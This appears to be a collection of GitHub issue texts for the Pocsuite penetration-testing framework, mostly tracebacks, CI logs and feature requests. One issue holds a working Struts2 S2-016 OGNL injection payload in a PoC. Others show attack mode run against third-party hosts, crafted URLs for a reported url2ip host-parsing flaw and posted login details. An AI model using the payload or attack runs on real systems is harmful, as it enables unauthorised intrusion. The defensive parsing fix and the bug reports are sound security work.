knownsec / pocsuite
This project is no longer maintained; please use the https://github.com/knownsec/pocsuite3 project instead.
Home Page: http://pocsuite.org
Pocsuite> help
Core Commands Menu (help <command> for details)
===============================================
attack Attack mode, sends exploit payload
back Move back from the current Interpreter
banner Display an awesome framework banner
debug Enter into python debug mode
exit Exit the current interpre
help Show help menu
pocadd Load available poc(s) from a directory or a file
pocdel Unload specific poc file(s)
poclist Show all available pocs / task pocs
seebug Download pocs from seebug with API Token
set Set key equal to value
show Show available options / modules
verify Verify Mode, checks if a vuln exists or not
Pocsuite> pocadd /tmp/dp.py
Pocsuite> poclist
IMPORTED-ID POC-PATH
=========== ========
1 /tmp/dp.py
POC--STATUS POC-PATH
=========== ========
ok dp.py
Pocsuite> set url http://192.168.1.100
Pocsuite> attack
[01:14:58] [*] setting the HTTP timeout
[01:14:58] [*] checking dp
[01:14:58] [*] poc:'dp' target:'http://192.168.1.100'
http://192.168.1.100/index.php/system/temporary/?file=config.tar.gz
[01:15:03] [-] 'TestPOC' object has no attribute 'result'
[01:15:03] [-] poc-12345 'Joomla com_jotloader - Full Path Disclosure Vulnerability' failed.
+----------------------+----------+--------+-----------+---------+---------------------------------------------------+
| target-url | poc-name | poc-id | component | version | status |
+----------------------+----------+--------+-----------+---------+---------------------------------------------------+
| http://192.168.1.100 | dp | 12345 | Joomla | 2.2.1 | Error: 'TestPOC' object has no attribute 'result' |
+----------------------+----------+--------+-----------+---------+---------------------------------------------------+
success : 0 / 1
pocsuite --url https://www.mysite.com/ --vul-keyword 'magento' --verify --report ./report.html
[pocsuite banner {2.0.6-nongit-20170922} http://pocsuite.org]
[!] legal disclaimer: Usage of pocsuite for attacking targets without prior mutual consent is illegal.
[*] starting at 15:46:36
No JSON object could be decoded
Traceback (most recent call last):
File "/Library/Python/2.7/site-packages/pocsuite/pocsuite_cli.py", line 157, in pcsInit
if not s.newToken():
File "/Library/Python/2.7/site-packages/pocsuite/api/x.py", line 107, in newToken
content = json.loads(req.content)
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/json/init.py", line 338, in loads
return _default_decoder.decode(s)
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/json/decoder.py", line 366, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/json/decoder.py", line 384, in raw_decode
raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded
In lib/controller/setpoc.py, multipleReplace() is applied only to .py files; .pyc files are not processed because of their file format.
I called the cannon API with the following code:
#!/usr/bin/python
# coding:utf-8
from pocsuite.api.cannon import Cannon
info = {"pocname": "modules\dlink_command_php_exec_noauth.py",  # should be the .py file name
        "pocstring": "dlink_command_php_exec_noauth.py",
        "mode": "verify"
        }
target = "www.baidu.com"
invoker = Cannon(target, info)  # create the instance that drives Pocsuite
result = invoker.run()  # run Pocsuite; result holds what the run returned
print result
The error encountered is as follows:
Traceback (most recent call last):
dlink_command_php_exec_noauth.py
File "D:/BitTorrentSync/Python_Code/scoutproject/scout/callpocsuite.py", line 9, in <module>
invoker = Cannon(target, info) # create the instance that drives Pocsuite
<code object <module> at 025185C0, file "dlink_command_php_exec_noauth.py", line 1>
File "C:\Python27\lib\site-packages\pocsuite-2.0.4.1-py2.7.egg\pocsuite\api\cannon.py", line 45, in __init__
self.registerPoc()
File "C:\Python27\lib\site-packages\pocsuite-2.0.4.1-py2.7.egg\pocsuite\api\cannon.py", line 62, in registerPoc
importer.load_module(self.moduleName)
File "C:\Python27\lib\site-packages\pocsuite-2.0.4.1-py2.7.egg\pocsuite\lib\core\common.py", line 60, in load_module
exec code in mod.__dict__ # exec runs the string as Python code; the names after 'in' are the global and local namespaces
File "dlink_command_php_exec_noauth.py", line 1, in <module>
NameError: name 'dlink_command_php_exec_noauth' is not defined
Suggest URL-encoding the search string here.
use the python pcs-console.py enter the command line, when input verify, i faced this error:
Traceback (most recent call last):
File "pcs-console.py", line 15, in <module>
sys.exit(main())
File "/home/niu/Pocsuite/pocsuite/pocsuite_console.py", line 25, in main
pcs.shell_will_go()
File "/home/niu/Pocsuite/pocsuite/lib/core/consoles.py", line 102, in shell_will_go
self.cmdloop()
File "/usr/lib/python2.7/cmd.py", line 142, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.7/cmd.py", line 221, in onecmd
return func(arg)
File "/home/niu/Pocsuite/pocsuite/lib/core/consoles.py", line 244, in do_verify
self.exploit()
File "/home/niu/Pocsuite/pocsuite/lib/core/consoles.py", line 171, in exploit
setMultipleTarget()
File "/home/niu/Pocsuite/pocsuite/lib/core/option.py", line 219, in setMultipleTarget
if conf.url.endswith('/24'):
AttributeError: 'NoneType' object has no attribute 'endswith'
This latest version has too many problems: ZoomEye is unstable, and pocsuite cannot use the ZoomEye/Seebug interface.
The error is as follows:
No JSON object could be decoded
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/pocsuite-2.0.6-py2.7.egg/pocsuite/pocsuite_cli.py", line 83, in pcsInit
if z.newToken():
File "/usr/local/lib/python2.7/dist-packages/pocsuite-2.0.6-py2.7.egg/pocsuite/api/x.py", line 40, in newToken
content = json.loads(req.content)
File "/usr/lib/python2.7/json/init.py", line 339, in loads
return _default_decoder.decode(s)
File "/usr/lib/python2.7/json/decoder.py", line 364, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/usr/lib/python2.7/json/decoder.py", line 382, in raw_decode
raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded
-r ***.pyc
If running in a Win OS env, "clear" will make no sense. cls should be a better idea.
Following the official documentation I added a TestPOC (using the test from the spec directly: https://github.com/knownsec/Pocsuite/blob/ee7c7da71e374d853eb9c8816ba3dbf9261683ed/docs/CODING.md#poc-%E7%BC%96%E5%86%99%E8%A7%84%E8%8C%83%E5%8F%8A%E8%A6%81%E6%B1%82%E8%AF%B4%E6%98%8E) and a test.py;
the two .py files are in the same directory;
test.py:
# -*- coding: utf-8 -*-
import pocsuite
from pocsuite.api.cannon import Cannon
from pocsuite.api.poc import register
import TestPOC
info={"pocname": "TestPOC",
"pocstring": u"sf",
"mode": "verify( or attack)"
}
target="test.site"
invoker=Cannon(target,info)
result=invoker.run()
When run, the error is as follows:
Traceback (most recent call last):
File "/root/xunfeng/aider/test.py", line 8, in <module>
import TestPOC
File "/root/xunfeng/aider/TestPOC.py", line 91, in <module>
register(TestPOC)
File "/home/project/sometest/venv/local/lib/python2.7/site-packages/pocsuite/lib/core/register.py", line 22, in registerPoc
if module in kb.registeredPocs:
File "/home/project/sometest/venv/local/lib/python2.7/site-packages/pocsuite/lib/core/datatype.py", line 46, in __getattr__
raise PocsuiteDataException("unable to access item '%s'" % item)
pocsuite.lib.core.exception.PocsuiteDataException: unable to access item 'registeredPocs'
After reading the source, I guess kb has no registeredPocs; after adding the initialisation
kb["registeredPocs"] = {}
to TestPOC.py, it works:
TestPOC
[18:11:29] [-] ('Connection aborted.', gaierror(-2, 'Name or service not known'))
('test.site', 'TestPOC', '1571', 'Drupal', '7.x', (3.0, ConnectionError(ProtocolError('Connection aborted.', gaierror(-2, 'Name or service not known')),)), '2017-07-05 18:11:29', '{}')
Process finished with exit code 0
But this way only one PoC can be run at a time. I keep feeling I am doing it the wrong way,
please advise.
https://travis-ci.org/knownsec/Pocsuite/jobs/160780949
https://gitlab.com/pycqa/flake8/issues/187
git.checkout
0.66s$ git clone --depth=50 https://github.com/knownsec/Pocsuite.git knownsec/Pocsuite
Cloning into 'knownsec/Pocsuite'...
remote: Counting objects: 1226, done.
remote: Compressing objects: 100% (524/524), done.
remote: Total 1226 (delta 778), reused 1081 (delta 692), pack-reused 0
Receiving objects: 100% (1226/1226), 1.67 MiB | 0 bytes/s, done.
Resolving deltas: 100% (778/778), done.
Checking connectivity... done.
$ cd knownsec/Pocsuite
0.37s$ git fetch origin +refs/pull/113/merge:
remote: Counting objects: 10, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 10 (delta 8), reused 9 (delta 8), pack-reused 0
Unpacking objects: 100% (10/10), done.
From https://github.com/knownsec/Pocsuite
* branch refs/pull/113/merge -> FETCH_HEAD
$ git checkout -qf FETCH_HEAD
This job is running on container-based infrastructure, which does not allow use of 'sudo', setuid and setguid executables.
If you require sudo, add 'sudo: required' to your .travis.yml
See https://docs.travis-ci.com/user/workers/container-based-infrastructure/ for details.
0.01s$ source ~/virtualenv/python2.6/bin/activate
$ python --version
Python 2.6.9
$ pip --version
pip 6.0.7 from /home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages (python 2.6)
install.1
2.51s$ pip install flake8
Collecting flake8
Downloading flake8-3.0.4-py2.py3-none-any.whl (64kB)
100% |################################| 65kB 2.3MB/s
Collecting pyflakes!=1.2.0,!=1.2.1,!=1.2.2,<1.3.0,>=0.8.1 (from flake8)
Downloading pyflakes-1.2.3-py2.py3-none-any.whl (209kB)
100% |################################| 212kB 2.0MB/s
Collecting mccabe<0.6.0,>=0.5.0 (from flake8)
Downloading mccabe-0.5.2-py2.py3-none-any.whl
Collecting enum34 (from flake8)
Downloading enum34-1.1.6-py2-none-any.whl
Collecting pycodestyle<2.1.0,>=2.0.0 (from flake8)
Downloading pycodestyle-2.0.0-py2.py3-none-any.whl (42kB)
100% |################################| 45kB 5.2MB/s
Collecting configparser (from flake8)
Downloading configparser-3.5.0.tar.gz
/tmp/pip-build-wUzH1r/configparser/setup.py:12: DeprecationWarning: Parameters to load are deprecated. Call .resolve and .require separately.
import sys
Collecting ordereddict (from configparser->flake8)
Downloading ordereddict-1.1.tar.gz
/tmp/pip-build-wUzH1r/ordereddict/setup.py:12: DeprecationWarning: Parameters to load are deprecated. Call .resolve and .require separately.
Installing collected packages: ordereddict, configparser, pycodestyle, enum34, mccabe, pyflakes, flake8
Running setup.py install for ordereddict
/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/setuptools/command/egg_info.py:171: DeprecationWarning: Parameters to load are deprecated. Call .resolve and .require separately.
writer = ep.load(installer=installer)
Running setup.py install for configparser
/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/setuptools/command/egg_info.py:171: DeprecationWarning: Parameters to load are deprecated. Call .resolve and .require separately.
writer = ep.load(installer=installer)
Skipping installation of /home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/backports/__init__.py (namespace package)
Installing /home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/configparser-3.5.0-py2.6-nspkg.pth
Successfully installed configparser-3.5.0 enum34-1.1.6 flake8-3.0.4 mccabe-0.5.2 ordereddict-1.1 pycodestyle-2.0.0 pyflakes-1.2.3
install.2
0.65s$ pip install pydocstyle
Collecting pydocstyle
Downloading pydocstyle-1.0.0-py2.py3-none-any.whl
Installing collected packages: pydocstyle
Successfully installed pydocstyle-1.0.0
0.10s$ python -c "from pocsuite.api.cannon import Cannon; import pocsuite"
The command "python -c "from pocsuite.api.cannon import Cannon; import pocsuite"" exited with 0.
0.33s$ python pocsuite.py --help
usage: pocsuite [options]
optional arguments:
-h, --help Show help message and exit
--version Show program's version number and exit
target:
-u URL, --url URL Target URL (e.g. "http://www.targetsite.com/")
-f URLFILE, --file URLFILE
Scan multiple targets given in a textual file
-r POCFILE Load POC from a file (e.g. "_0001_cms_sql_inj.py") or directory (e.g. "modules/")
mode:
--verify Run poc with verify mode
--attack Run poc with attack mode
request:
--cookie COOKIE HTTP Cookie header value
--referer REFERER HTTP Referer header value
--user-agent AGENT HTTP User-Agent header value
--random-agent Use randomly selected HTTP User-Agent header value
--proxy PROXY Use a proxy to connect to the target URL
--proxy-cred PROXYCRED
Proxy authentication credentials (name:password)
--timeout TIMEOUT Seconds to wait before timeout connection (default 30)
--retry RETRY Time out retrials times.
--delay DELAY Delay between two request of one thread
--headers HEADERS Extra headers (e.g. "key1: value1\nkey2: value2")
--host HOST Host in HTTP headers.
params:
--extra-params EXTRA_PARAMS
Extra params (e.g. "{username: '***', password: '***'}")
optimization:
--threads THREADS Max number of concurrent HTTP(s) requests (default 1)
--report REPORT Save a html report to file (e.g. "./report.html")
--batch BATCH Automatically choose defaut choice without asking.
--requires Check install_requires
--quiet Activate quiet mode, working without logger.
--requires-freeze Check install_requires after register.
Zoomeye or Seebug:
--dork DORK Zoomeye dork used for search.
--max-page MAX_PAGE Max page used in ZoomEye API(10 targets/Page).
--search-type SEARCH_TYPE
search type used in ZoomEye API, web or host
--vul-keyword VULKEYWORD
Seebug keyword used for search.
The command "python pocsuite.py --help" exited with 0.
0.32s$ flake8 . --max-line-length=120 --exclude pocsuite/thirdparty --ignore F401,N802,N803,N806,E501,N813,N801,N812
/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/options/config.py:56: DeprecationWarning: You passed a bytestring as `filenames`. This will not work on Python 3. Use `cp.read_file()` or switch to using Unicode strings across the board.
found_files = config.read(files)
Traceback (most recent call last):
File "/home/travis/virtualenv/python2.6.9/bin/flake8", line 11, in <module>
sys.exit(main())
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/main/cli.py", line 16, in main
app.run(argv)
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/main/application.py", line 316, in run
self._run(argv)
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/main/application.py", line 300, in _run
self.run_checks()
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/main/application.py", line 237, in run_checks
self.file_checker_manager.start(files)
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/checker.py", line 364, in start
self.make_checkers(paths)
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/checker.py", line 272, in make_checkers
checks = self.checks.to_dictionary()
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 450, in to_dictionary
plugin.to_dictionary() for plugin in self.ast_plugins
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 488, in ast_plugins
plugins = list(self.checks_expecting('tree'))
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 443, in checks_expecting
if argument_name == plugin.parameter_names[0]:
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 95, in parameter_names
self._parameter_names = list(self.parameters)
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 88, in parameters
self._parameters = utils.parameters_for(self)
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/utils.py", line 297, in parameters_for
parameters = collections.OrderedDict([
AttributeError: 'module' object has no attribute 'OrderedDict'
The command "flake8 . --max-line-length=120 --exclude pocsuite/thirdparty --ignore F401,N802,N803,N806,E501,N813,N801,N812" exited with 1.
Done. Your build exited with 1.
The first concerns "--random-agent". After using this option, the generated User-Agent takes the form ['Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0'], i.e. with an extra pair of square brackets and quotes;
The second concerns the "-u" option. For an address passed via "-u", if it does not start with "http://" or "https://", "http://" is prepended, without considering protocols such as "ftp://", which is inconvenient in use.
If a pocsuite newbie,
$ ./pcs-console.py -h
Traceback (most recent call last):
File "./pcs-console.py", line 15, in <module>
sys.exit(main())
File "/Users/Open-Security/Code/ks-pocsuite/pocsuite/pocsuite_console.py", line 27, in main
initializePoc(folders)
File "/Users/Open-Security/Code/ks-pocsuite/pocsuite/lib/core/consoles.py", line 53, in initializePoc
files = os.listdir(folder)
OSError: [Errno 2] No such file or directory: '-h'
def set_pwd(self, pwd):
    self._password = pwd
A line is missing that updates the parameter data sent with the check request:
def set_pwd(self, pwd):
    self._password = pwd
    self._check_data[self._password] = self._check_statement  # this line is missing
If possible, webshells should be in a directory, ex:
If you want to generate webshell flags, please redirect to How to random a string or a number
Please fix links in English README - Usage Part, ex:
Those links are invalid.
We cloned the code from the repository and ran the pocsuite console. The error message is as follows:
┌─[lab@core]─[/opt/Pocsuite/pocsuite]
└──╼ python pcs-console.py
Traceback (most recent call last):
File "pcs-console.py", line 28, in <module>
initializePoc(folders)
File "/opt/Pocsuite/pocsuite/lib/core/consoles.py", line 50, in initializePoc
files = os.listdir(folder)
OSError: [Errno 2] No such file or directory: '/opt/Pocsuite/pocsuite/modules'
Please create modules directory , or solve the issue in another way.
Try to add a powerful and interactive console,
$ ./pcs-console.py ./modules
,--. ,--.
,---. ,---. ,---.,---.,--.,--`--,-' '-.,---. {2.0.4.1-782b2aa}
| .-. | .-. | .--( .-'| || ,--'-. .-| .-. :
| '-' ' '-' \ `--.-' `' '' | | | | \ --.
| |-' `---' `---`----' `----'`--' `--' `----'
`--' http://pocsuite.org
Pocsuite> help
Core Commands Menu (help <command> for details)
===============================================
attack conduncting attack
back Move back from the current context
banner Display an awesome framework banner
help Show help menu
load load specific poc file(s).
set Set key equal to value
show Show available options / modules
verify conducting verification
Pocsuite> show pocs
{1: './modules/apache_struts_s2_033.py',
2: './modules/dlink_command_php_exec_noauth.py'}
Pocsuite> load 2
[*] load poc file(s) success!
Pocsuite> set url http://www.baidu.com/
Pocsuite> attack
[07:18:53] [*] setting the HTTP timeout
[07:18:53] [*] checking dlink_command_php_exec_noauth
[07:18:53] [!] missing ['appPowerLink'] in dlink_command_php_exec_noauth
[07:18:53] [*] poc:'dlink_command_php_exec_noauth' target:'http://www.baidu.com/'
[07:18:54] [-] poc-78176 'Multiple Vulnerabilities in D-Link DIR-600 and DIR-300' failed.
+-----------------------+-------------------------------+--------+-----------+------------------+----------+
| target-url | poc-name | poc-id | component | version | status |
+-----------------------+-------------------------------+--------+-----------+------------------+----------+
| http://www.baidu.com/ | dlink_command_php_exec_noauth | 78176 | D-Link | DIR-300, DIR-600 | Error: n |
+-----------------------+-------------------------------+--------+-----------+------------------+----------+
success : 0 / 1
Hi.
Thank you for making a good tool.
I ZoomEye API error occurs.
What is the solution?
Check the following logs.
root@kali-Odin:~# pocsuite --dork 'port:6379' --max-page 3 --vul-keyword redis --verify
[!] legal disclaimer: Usage of pocsuite for attacking targets without prior mutual consent is illegal.
[*] starting at 05:55:29
[05:55:34] [+] ZoomEye API authorization failed,Please input ZoomEye Email and Password for use ZoomEye API!
ZoomEye Email:[email protected]
ZoomEye Password:password123
Thanks.
For example, a PoC may need extra data to run properly, such as an application key (authkey); during a pentest or scan every site's key is different, so it has to be passed in from outside for the PoC's overall flow to be correct.
After a rough look at the docs I have a question: does this framework only support writing HTTP PoCs? If I want to write a non-HTTP PoC, do I need to write my own PoC class?
To reduce the false-positive rate of the Attack method, call Verify before Attack, and only run the Attack logic after the vulnerability has been confirmed.
Now the question: should the framework call Verify automatically?
Once is enough.
from pocsuite.lib.utils import versioncheck
from pocsuite.lib.utils import versioncheck
from pocsuite.lib.utils import versioncheck
from pocsuite.lib.utils import versioncheck
from .lib.utils import versioncheck
Hi, I have been testing for a long time. The official docs say req works just like the requests module, but when I test my PoC, get works (req.get) while req.post does not. Hoping for some guidance; the full PoC follows:
#!/usr/bin/env python
import re
import urlparse
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = '' # ssvid
version = '1'
author = ['']
vulDate = ''
createDate = ''
updateDate = ''
references = ['']
name = '5clib_str2-016'
appPowerLink = 'http://www.wooyun.org/bugs/wooyun-2010-0128686'
appName = '5clib'
appVersion = ''
vulType = 'str2-016'
desc = '''
5clib_str2-016
'''
samples = ['http://58.119.33.50:8081/']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/5clib/property.action')
payload = "?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
resp = req.get(vulurl + payload)
if resp.status_code == 200 and '88888887' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
https://github.com/knownsec/Pocsuite/blob/master/docs/INTEGRATE.md#poc-成功失败异常信息
The poc fields returned by the cannon API described in the manual are not detailed enough; the poc's desc, vulType and references fields are not returned.
[11:15:19] [-] unable to access item 'retry'
[- 09/18/16 11:15:19,018][cannon.py:71] >> unable to access item 'retry'
When verifying the Solr unauthorised-access vulnerability, searching `solr country:cn` in the web UI
returns results normally, 160+.
Using --dork "solr"
works fine.
Using --dork "country:cn"
works fine.
Using --dork "solr country:cn"
gives no results.
I checked the official API docs and found no such feature. Am I doing it wrong?
Also, looking at the API source, only the IP is returned, but in an actual PoC the port is also very important; would you consider adding a few lines to return IP+port?
def search(self, dork, page=1, resource='web'):
req = requests.get(
'https://api.zoomeye.org/{}/search?query="{}"&page={}&facet=app,os'.format(resource, urllib.quote(dork),
page + 1),
headers=self.headers
)
content = json.loads(req.content)
if 'matches' in content:
anslist = []
for match in content['matches']:
ans = match['ip']
if match.has_key('portinfo'):
ans += ':' + str(match['portinfo']['port'])
anslist.append(ans)
return anslist
else:
return []
For JS redirects like the one below, get cannot follow them; requests can be patched:
>>> url = r'http://m.baidu.com/from=1012585f/bd_page_type=1/ssid=15567761646568656174327407/uid=0/pu=usm%402%2Csz%401320_2001%2Cta%40iphone_1_3.0_3_528/baiduid=F8CF1C9B13A69F341A9A38C3718410D8/w=10_10_%E9%B1%BC%E8%82%9D%E6%B2%B9%E7%9A%84%E5%8A%9F%E6%95%88%E4%B8%8E%E4%BD%9C%E7%94%A8/t=iphone/l=1/tc?ref=www_iphone&lid=16538771669423618855&order=4&waplogo=1&fm=wnor&dict=-1&tj=www_zhidao_normal_4_10_10_title&sec=8644&di=312580a852c21860&bdenc=1&nsrc=IlPT2AEptyoA_yixCFOxXnANedT62v3IDBqMMS6LLDivpEmixP4kHREsRC0aNWiCGkb8gTCcshYFuX3b_71l8hRArKtosWka6SWhuKC'
>>> import requests
>>> res = requests.head(url)
>>> res.headers['Location']
'http://zhidao.baidu.com/question/390970477767010205.html'
On Kali, after installing pocsuite and running pcs-console.py, it shows the following:
Pcs.poc> avaliable
+-------+----------------------------+---------+
| pocId | avaliablePocName | Folder |
+-------+----------------------------+---------+
| 1 | dede_download.php_sqli.php | modules |
| 2 | SSV-62274 | modules |
| 3 | dede_guestbook_sqli | modules |
| 4 | dede_search.php_sqli | modules |
| 5 | dede_recommend.php_sqli | modules |
+-------+----------------------------+---------+
Pcs.poc> load 1
unable to access item 'isPocString'
The program version is the latest, 1.2.6.
Looking for the cause~
An English version of the help documentation is needed.
As in the title.
For an address passed via "-u", if it does not start with "http://" or "https://" or specifies no protocol, "http://" is prepended to the address, which is inconvenient for protocols such as ssh and ftp (the address has to be re-processed inside the PoC).
Suggested fix: detect whether the PoC imports packages such as urllib or requests. If not, assume the PoC author is already aware of the address-handling issue and leave the address untouched.
As in the title.
def url2ip(url):
"""
works like turning 'http://baidu.com' => '180.149.132.47'
"""
iport = urlsplit(url)[1].split(':')
if len(iport) > 1:
return gethostbyname(iport[0]), iport[1]
return gethostbyname(iport[0])
http://localhost:[email protected]/
The url2ip function in this file may, when resolving the IP address for a URL, resolve a different IP because the ':' split is handled incorrectly, causing SSRF.
Standard URL format:
scheme://username:password@subdomain.domain.tld:port/directory/filename.ext?param=value#fragment
If the following URL is passed to the function:
"http://localhost:[email protected]/"
it finally returns:
('127.0.0.1', '[email protected]')
Arbitrary IP address resolution:
http://0x08080808:www.baidu.com/
http://0x08080808:[email protected]/
returns:
('8.8.8.8', 'www.baidu.com')
('8.8.8.8', '[email protected]')
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from pocsuite.api.utils import url2ip
class TestPOC(POCBase):
name = "url2iptest"
vulID = 'test'
author = ['']
vulType = 'test'
version = '1.0'
references = ''
desc = ''
vulDate = ''
createDate = ''
updateDate = ''
appName = ''
appVersion = ''
appPowerLink = ''
samples = []
def _attack(self):
return self._verify()
def _verify(self):
address=url2ip(self.url)
result={}
result['ipinfo']={}
result['ipinfo']['address']=address
return self.parse_output(result)
def parse_output(self,result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
Hoping for a safe and reliable parsing solution soon...
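As an added example (not the project's code and not the reporter's), the netloc handling reported above is placed next to a hardened replacement that relies on urlsplit()'s own hostname and port parsing instead of splitting the netloc on ':'. It goes slightly beyond the report: numeric-looking hosts are also required to be canonical IP literals, because gethostbyname() accepts inet_aton() shorthand such as 0x08080808. It assumes Python 3; the URLs in the docstrings and tests are constructed and use example.com, and DNS resolution is kept in a separate function so the parsing can be checked offline.

```python
import ipaddress
import re
from socket import gethostbyname
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

# Hex/decimal/dotted forms that inet_aton() would accept (0x08080808, 2130706433,
# 127.1). A host matching this must also be a canonical IP literal to be allowed.
_NUMERIC_HOST = re.compile(r"(0[xX][0-9a-fA-F]+|\d+)(\.(0[xX][0-9a-fA-F]+|\d+))*")


def vulnerable_split(url):
    """Netloc handling as reported for url2ip: split urlsplit(url)[1] on ':'.

    Returns (host_to_resolve, remainder). Userinfo is never stripped, so for
    'http://localhost:secret@www.example.com/' the host that would be resolved
    is 'localhost', and for 'http://0x08080808:www.example.com/' it is the hex
    literal 0x08080808 (8.8.8.8), not the domain the operator intended.
    """
    iport = urlsplit(url)[1].split(":")
    if len(iport) > 1:
        return iport[0], iport[1]
    return iport[0], None


def safe_host_port(url):
    """Hardened parse: (hostname, port) via urlsplit, rejecting anything odd.

    Raises ValueError for an unsupported scheme, a missing host, a non-numeric
    port (this is how 'http://0x08080808:www.example.com/' is caught) and for
    numeric-looking hosts that are not canonical IP literals.
    """
    parts = urlsplit(url)
    if parts.scheme not in DEFAULT_PORTS:
        raise ValueError("unsupported scheme %r" % parts.scheme)
    host = parts.hostname  # userinfo removed, IPv6 brackets stripped, lower-cased
    if not host:
        raise ValueError("no host in %r" % url)
    try:
        port = parts.port  # ValueError when the port text is not an integer
    except ValueError:
        raise ValueError("invalid port in %r" % url) from None
    if port is None:
        port = DEFAULT_PORTS[parts.scheme]
    if _NUMERIC_HOST.fullmatch(host):
        try:
            host = str(ipaddress.ip_address(host))  # canonical dotted form only
        except ValueError:
            raise ValueError("non-canonical IP literal %r" % host) from None
    return host, port


def url2ip(url):
    """Resolve only the validated hostname; returns (ip, port). Needs DNS."""
    host, port = safe_host_port(url)
    return gethostbyname(host), port
```

A PoC that wants the raw host for a non-HTTP check can call safe_host_port() and do its own resolution; the point is that the host string handed to the resolver never comes from userinfo or from the text after the first ':'.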
https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md
In "to prevent false positives and to avoid the keywords being used as detection signatures by WAFs etc., the verification result output is required to be a random string (the randoStr method in the API can be called)", "randoStr" should be "randomStr".
I ran into a problem while writing a PoC. Suppose a script checks whether admin_index.php exists; by default the file is under the admin directory, but if the user has renamed the default directory the script also has to change to run correctly. I do not want to edit the PoC by hand for every scan, so I use extra-params to override the variable's default; in the script I use
self.params["variable"] to read the user's input, with a check that assigns a default value if it is absent.
But I hit a problem: when the user does not pass the value, the PoC does not run at all.
I do not know where the problem is.
options.py
def _setHTTPCookies():
"""
Set the HTTP Cookie header
"""
if conf.cookie:
debugMsg = "setting the HTTP Cookie header"
logger.debug(debugMsg)
conf.httpHeaders[HTTP_HEADER.COOKIE] = conf.cookie
Change to:
def _setHTTPCookies():
"""
Set the HTTP Cookie header
"""
if conf.cookie:
debugMsg = "setting the HTTP Cookie header"
logger.debug(debugMsg)
conf.httpHeaders[HTTP_HEADER.COOKIE] = conf.cookie
else:
conf.httpHeaders[HTTP_HEADER.COOKIE] = None
Otherwise a PoC that touches self.header['Cookie'] has to wrap it in try...except...
Is it necessary to put third-party modules in the thirdparty direcroty?
Benefit:
Disadvantage:
A discussion on referencing third-party modules:
Is it necessary to compile and bundle third-party modules in the "thirdparty" directory?
Benefits:
Drawbacks:
It seems we could maintain two branches?
One is the current code version, which only needs to provide basic invocation functionality, aimed mainly at beginners and users who do not know how to install things.
The other is a new version that uses coroutines to improve performance and lets users install Pocsuite and its dependencies via a Makefile or similar; this would be the main development branch going forward.
As in the title, e.g.: revision.py, convert.py